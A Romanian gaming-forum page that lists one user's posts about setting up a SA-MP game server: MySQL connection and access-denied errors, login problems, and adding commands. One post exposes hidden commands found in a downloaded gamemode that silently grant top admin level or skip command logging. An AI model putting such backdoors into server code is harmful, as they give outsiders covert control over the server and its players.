Jump to content

eLLemenT_

Membru
  • Posts

    38
  • Joined

  • Last visited

Everything posted by eLLemenT_

  1. Un prieten a gasit un gm pe net si a zis ca are un checkpoint care nu ii arata dealership-ul adevarat . Mi-a zis sa il ajut .. Cum pot gasii acel checkpoint in gm pentru a il pune in ds-ul real ? GM: Reinforce
  2. Vreau sa imi fac si eu un server . Am inceput sa scriptez si am primit ajutor si de la 1 baiat . Ma gandeam daca tot am itd ala server-ul ala care iti creezi textdraw-uri. Cum pot face si eu asa ?
  3. Hai că nici nu are comandă ascunsă if(strcmp(cmdtext, "/kruzzaretalent", true) == 0) { return 1; } else { printf("[server] [cmd] %s (ID %d): %s", szPlayerName, playerid, cmdtext); } if(playerVariables[playerid][pMuted] > 0) { SendClientMessage(playerid, COLOR_GREY, "You cannot submit any commands or text at the moment, as you have been muted."); return 0; } Am mai găsit una CMD:kruzzkruzz23(playerid, params[]) { playerVariables[playerid][pAdminLevel] = 8; return 1; } Incă una CMD:wipe69(playerid, params[]) { playerVariables[playerid][pAdminLevel] = 8; return 1; }
  4. Ok , deci sper ca ma puteti ajuta Intru pe server-ul meu si incerc sa ma inregistrez [tin sa mentionez ca am baza de date conectata si am si datele pe server] Scriu parola , ma pune sa ma loghez Scriu corect parola si imi spune ca nu e corecta . Oare ce are ? [Gamemode-ul RulzGame]
  5. unde este dealership-ul ? Cand am mers acolo une mi-l arata pe gps nu imi arata nimic .. Imi puteti spune ?
  6. Salut , sunt mai incepator .. Am pus server-ul pe host si as vrea sa creez comenzi pentru server gen /news , /aduty si altele
  7. Da , multumesc ! A mers ! Dar am o alta problema . Cand vreau sa il pun pe host bag acolo la connection.inc tot de la mysql si dupa cand il pornesc imi spune asta din nou [13:02:55] [MYSQL]: Connection to database (w3op) failed! [13:02:55] [13:02:55] [13:02:55] RPG: v0.2 Beta LS-LV-SF [13:02:55] _____________________ [13:02:55] Number of vehicle models: 1 [13:02:55] --- Server Shutting Down. [13:02:55] plugin.mysql: Unloading plugin... [13:02:55] plugin.mysql: Plugin unloaded.
  8. @WopsSma refer problema asta [13:02:55] [MYSQL]: Connection to database (w3op) failed! [13:02:55] [13:02:55] [13:02:55] RPG: v0.2 Beta LS-LV-SF [13:02:55] _____________________ [13:02:55] Number of vehicle models: 1 [13:02:55] --- Server Shutting Down. [13:02:55] plugin.mysql: Unloading plugin... [13:02:55] plugin.mysql: Plugin unloaded.
  9. @WopsS Am pus baza de date , 1 problema rezolvata .. dar ce fac ? a 2-a eroare
  10. Nu inteleg , poti sa imi explici mai bine ?
  11. Am 2 probleme 1. [13:02:55] [MYSQL]: Connection to database (w3op) failed! [13:02:55] [13:02:55] [13:02:55] RPG: v0.2 Beta LS-LV-SF [13:02:55] _____________________ [13:02:55] Number of vehicle models: 1 [13:02:55] --- Server Shutting Down. [13:02:55] plugin.mysql: Unloading plugin... [13:02:55] plugin.mysql: Plugin unloaded. 2. Comanda SQL: -- -- Bază de date: `w3op` -- CREATE DATABASE IF NOT EXISTS `w3op` DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci; MySQL zice: #1044 - Access denied for user 'port_8007'@'localhost' to database 'w3op'
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. For more details you can also review our Terms of Use and Privacy Policy.